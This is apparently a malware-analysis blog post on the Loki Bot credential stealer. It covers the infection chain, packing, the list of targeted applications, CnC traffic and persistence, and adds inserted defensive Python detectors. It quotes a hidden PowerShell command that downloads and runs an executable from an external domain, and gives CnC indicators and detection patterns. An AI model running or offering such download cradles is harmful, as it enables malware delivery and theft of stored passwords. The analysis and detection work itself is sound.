
A few hours after the latest ransomware attack, the one with the "NotPetya" ransomware, some files were linked to the attack as its attack vector. Some antimalware companies and malware research communities talked about domains and samples that had been related to this attack.

For that reason, I started to analyze the samples to get to the bottom of the matter. For your tranquillity, I must say that the samples are not related to the "NotPetya" ransomware; they belong to an interesting malware, dubbed "Loki Bot", which I am going to explain.

Attack vector.

Loki Bot is a sensitive-information stealer. It can read private information from a large list of Windows programs and sends it to the CnC.

You can buy this malware on the internet with different modules and features.

As some malware researchers said, the attack vector starts with a .doc file. This file exploits a known vulnerability (CVE-2017-0199 – Info) to download another file from a server (84.200.16.242/myguy.xls).

The downloaded .xls file has an embedded macro that downloads a binary file from another server using PowerShell.

We can find the script by opening the .xls file with a hex editor.

After extracting and executing the script, it will try to download a .exe file from the french-cooking[.]com domain.

PowerShell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking[.]com/myguy[.]exe', 'C:\Users\d00rt\AppData\Roaming\45298.exe');

Finally, when myguy.exe is executed, it tries to connect to the CnC, coffeinoffice.xyz.

Let's see what happens with myguy.exe ;)

Loki Bot Analysis.

MD5 A1D5895F85751DFE67D19CCCB51B051A
SHA1 9288FB8E96D419586FC8C595DD95353D48E8A060
UNPACKING

This sample is protected with a custom packer, but in the end it uses the RunPE technique to unpack itself; at that moment we can dump it and start a comfortable analysis.

Unpacked MD5 49F3606755B12230BFF639361C7109A7
Unpacked SHA1 234A7174E67EEC394FAF5139BC79C69BF0EBFFB8
WINDOWS API

This sample is not easy to analyze; it has some techniques to make the analysis more difficult. For example, to call any function of the Windows API, it uses a special resolver function. To make it work, the malware has to push three values, and the function then returns the memory address of the API function it is looking for.

Main functionality

Loki Bot calls WSAStartup, then it creates a mutex whose name is derived from the MD5 of the machine GUID:

import hashlib
# machine_GUID is the MachineGuid value of the host as a string (example value, constructed)
machine_GUID = "00000000-0000-0000-0000-000000000000"
mutex_name = hashlib.md5(machine_GUID.encode()).hexdigest()[:24]

Later, Loki Bot collects sensitive information from the supported modules and sends it to the CnC.
After stealing data, it gains persistence on the system and finally waits for CnC commands in a loop.

SENSITIVE DATA

Loki Bot supports a lot of different Windows applications to steal information. In the following table you can find all the modules that I could identify during the analysis.

Firefox SoftwareNet mSecure Bitvise 1Password
IceDragon FTPShell vnc_files WinFTP Winbox
Safari NppFTP BlazeFTP MartinPrikryl KDBX_files
K_Meleon MyFTP FAStream_NetFile FreshFTP Enpass
SeaMonkey FTPBox GoFTP BitKinex z_Mailing
Flock SherrodFTP ESTSoft_FTP UltraFXP Opera_Mail
Black_Hawk FTPNow DeluxeFTP FTPNow2 PostBox
Lunascape Nexus TotalComander VanDyke FossaMail
Comodo XFTP FTPGetter OdinFTP MailBox
Opera EasyFTP WS_FTP NCH_FLING WinChips
QtWeb SFTP_NetDrive FullTiltPoker NCH_CLASSIC Outlook
QupZilla AbleFTP PokerStars Kitty YMail2
Vault JaSFTP ExpandDrive ThunderBird TrulyMail
Cyberfox Automize Steed FoxMail spn_files
Pale_Moon Cyberduck FlashFXP PocoMail TODODesktop
WaterFox FullSync NovaFTP IncrediMail Stickies
GoogleTark FTPInfo NetDrive GmailNotifierPro NoteFly
SuperPutty LinasFTP TotalComander dcf_files Notezilla
Syncovery FileZilla SmartFTP 32BitFTP StickyNotes
FTPNavigato StaffFTP FarManager RoboForm

Loki Bot loads an array with the addresses of the different modules and calls them dynamically.

During my analysis, the malware got my Gmail account data from the Comodo Dragon browser and the FileZilla config. (Look at the stolen data: you can see passwords in plain text :O ).

Once Loki Bot has finished stealing data, it prepares a packet to send to the CnC. The data is compressed with a compression algorithm.

The data size before compression was 0x2541, and after compression it is 0xB27.

The malware obtains the computer metadata to tie the stolen data to the computer it was stolen from. This metadata will be the header of the packet that is sent to the CnC, including some flags (data size, stolen data size per module, ...) which I am not going to explain in depth in this post.

In the next image we see the final payload to send to CnC and the CnC domain:

HTTP request (I patched the host to see the request because the real server is down). It uses "Mozilla/4.08 (Charon; Inferno)" as User-Agent.
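As an added example, not part of the original post and not Loki Bot's or the author's code, the following Python matches the two host-side and network-side artifacts described above (the hidden PowerShell DownloadFile cradle from the macro, and the "Mozilla/4.08 (Charon; Inferno)" User-Agent of the CnC request) against a few constructed process-creation and HTTP log events. The "timestamp|kind|payload" event format, the sample lines and the function names are my assumptions; the download domain, the CnC domain and the User-Agent string come from the analysis.

```python
import re

# Indicators reported in the analysis above: the download domain, the CnC
# domain and the User-Agent string Loki Bot sends.
LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"
KNOWN_DOMAINS = {"french-cooking.com", "coffeinoffice.xyz"}

# PowerShell download cradle as seen in the macro: hidden window plus
# WebClient.DownloadFile(url, destination).
CRADLE_RE = re.compile(
    r"powershell(?:\.exe)?.*-WindowStyle\s+Hidden.*"
    r"\(New-Object\s+System\.Net\.WebClient\)\.DownloadFile\("
    r"\s*'(?P<url>[^']+)'\s*,\s*'(?P<dst>[^']+)'",
    re.IGNORECASE,
)
# Constructed HTTP event payload: "host=<host> ua=<user agent>".
HTTP_RE = re.compile(r"host=(?P<host>\S+)\s+ua=(?P<ua>.*)$")


def check_command_line(cmdline):
    """Return a reason string if cmdline looks like the download cradle, else None."""
    m = CRADLE_RE.search(cmdline)
    if not m:
        return None
    reasons = ["hidden PowerShell WebClient.DownloadFile"]
    if re.search(r"\\AppData\\Roaming\\", m.group("dst"), re.IGNORECASE):
        reasons.append("payload dropped under AppData\\Roaming")
    host = re.sub(r"^https?://", "", m.group("url"), flags=re.IGNORECASE)
    host = host.split("/")[0].lower()
    if host in KNOWN_DOMAINS:
        reasons.append("download from known domain " + host)
    return "; ".join(reasons)


def check_http(host, user_agent):
    """Return a reason string if the request matches the Loki Bot beacon, else None."""
    reasons = []
    if user_agent.strip() == LOKIBOT_USER_AGENT:
        reasons.append("Loki Bot User-Agent")
    if host.lower() in KNOWN_DOMAINS:
        reasons.append("request to known CnC domain " + host.lower())
    return "; ".join(reasons) or None


def scan_events(lines):
    """Scan 'timestamp|kind|payload' events; return a list of (timestamp, reason) hits."""
    hits = []
    for line in lines:
        ts, kind, payload = line.split("|", 2)
        reason = None
        if kind == "proc":
            reason = check_command_line(payload)
        elif kind == "http":
            m = HTTP_RE.match(payload)
            if m:
                reason = check_http(m.group("host"), m.group("ua"))
        if reason:
            hits.append((ts, reason))
    return hits


# Constructed sample events (timestamps and the benign lines are invented; the
# cradle and the beacon reproduce what the analysis reports).
SAMPLE_EVENTS = [
    r"2017-06-28T10:01:05|proc|powershell.exe -Command Get-Process",
    r'''2017-06-28T10:02:11|proc|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\d00rt\AppData\Roaming\45298.exe');''',
    r"2017-06-28T10:02:50|http|host=example.org ua=Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    r"2017-06-28T10:03:40|http|host=coffeinoffice.xyz ua=Mozilla/4.08 (Charon; Inferno)",
]

if __name__ == "__main__":
    for ts, reason in scan_events(SAMPLE_EVENTS):
        print(ts, reason)
```

The command-line check deliberately keys on the behaviour (hidden window, WebClient download, drop under the roaming profile) rather than only on the domain, since the domain in a new campaign will differ while the cradle shape tends to stay the same; the User-Agent match is exact because the string is unusual enough to be low-noise.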

Finally, Loki Bot stays in a loop waiting for commands from the CnC. Loki Bot sends the CnC a "clean" packet (just the metadata header we saw previously). If the CnC responds to the request, Loki Bot creates a thread to parse the CnC answer.

I analyzed this part statically because the server is down, so some parts are not clear, but I found different behaviours depending on the CnC response.

1. The CnC can ask it to steal sensitive data again.
2. The CnC can request that the compromised computer download, execute and load files and libraries.


Basically, Loki Bot looks like it can do whatever it wants. It could perform backdoor tasks, or update itself with new features.

PERSISTENCE

Loki Bot copies and hides itself in the following folder: "C:\Users\d00rt\AppData\Roaming\72431D". The malware sets the folder and file attributes using SetFileAttributes with the value 0x2006.

0x2006 Attribute
0x2 FILE_ATTRIBUTE_HIDDEN
0x4 FILE_ATTRIBUTE_SYSTEM
0x2000 FILE_ATTRIBUTE_NOT_CONTENT_INDEXED
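Added example, not from the original post and not Loki Bot's or the author's code: a small Python helper that decodes the attribute mask from the table above and flags entries carrying all three bits (hidden, system and not content indexed), the combination Loki Bot sets on its copy. The sample listing is constructed (paths modelled on the one reported in the post), os.stat(...).st_file_attributes only exists on Windows so the live scan returns nothing elsewhere, and the function names are mine.

```python
import os
import sys

# Attribute bits from the table above (Win32 FILE_ATTRIBUTE_* values).
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x2000
# The value Loki Bot passes to SetFileAttributes.
LOKIBOT_ATTRIBUTES = (FILE_ATTRIBUTE_HIDDEN
                      | FILE_ATTRIBUTE_SYSTEM
                      | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED)  # 0x2006

# A few other common bits so that decoded masks read sensibly.
ATTRIBUTE_NAMES = {
    0x1: "FILE_ATTRIBUTE_READONLY",
    FILE_ATTRIBUTE_HIDDEN: "FILE_ATTRIBUTE_HIDDEN",
    FILE_ATTRIBUTE_SYSTEM: "FILE_ATTRIBUTE_SYSTEM",
    0x10: "FILE_ATTRIBUTE_DIRECTORY",
    0x20: "FILE_ATTRIBUTE_ARCHIVE",
    0x80: "FILE_ATTRIBUTE_NORMAL",
    FILE_ATTRIBUTE_NOT_CONTENT_INDEXED: "FILE_ATTRIBUTE_NOT_CONTENT_INDEXED",
}


def decode_attributes(attrs):
    """Return the names of the known bits set in attrs, lowest bit first."""
    return [name for bit, name in sorted(ATTRIBUTE_NAMES.items()) if attrs & bit]


def has_lokibot_mask(attrs):
    """True when all three bits Loki Bot sets are present (other bits may be set too)."""
    return attrs & LOKIBOT_ATTRIBUTES == LOKIBOT_ATTRIBUTES


def find_suspicious(entries):
    """entries: iterable of (path, attrs). Returns the paths carrying the full mask."""
    return [path for path, attrs in entries if has_lokibot_mask(attrs)]


def scan_directory(root):
    """Walk root on Windows and return (path, attrs) for every entry with the full mask.

    st_file_attributes is Windows-only, so on other platforms the result is empty.
    """
    if sys.platform != "win32":
        return []
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                attrs = os.stat(path).st_file_attributes
            except OSError:
                continue
            if has_lokibot_mask(attrs):
                hits.append((path, attrs))
    return hits


# Constructed sample listing (paths modelled on the one reported in the post).
SAMPLE_ENTRIES = [
    (r"C:\Users\d00rt\AppData\Roaming\72431D", 0x2016),            # directory, H+S+I
    (r"C:\Users\d00rt\AppData\Roaming\72431D\45298.exe", 0x2006),  # H+S+I
    (r"C:\Users\d00rt\AppData\Roaming\Microsoft\Windows\Themes\x.jpg", 0x20),  # archive only
    (r"C:\Users\d00rt\AppData\Roaming\desktop.ini", 0x6),          # hidden+system, no I bit
]

if __name__ == "__main__":
    for path in find_suspicious(SAMPLE_ENTRIES):
        print("suspicious:", path)
    # Live check of the current user's roaming profile on Windows.
    roaming = os.environ.get("APPDATA")
    if roaming:
        for path, attrs in scan_directory(roaming):
            print(path, hex(attrs), decode_attributes(attrs))
```

Hidden plus system on its own is common for legitimate files (desktop.ini is the usual example), so the check requires the third bit as well; even then a hit under AppData\Roaming is a triage signal to look at the file, not a verdict.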

Author: @D00RT
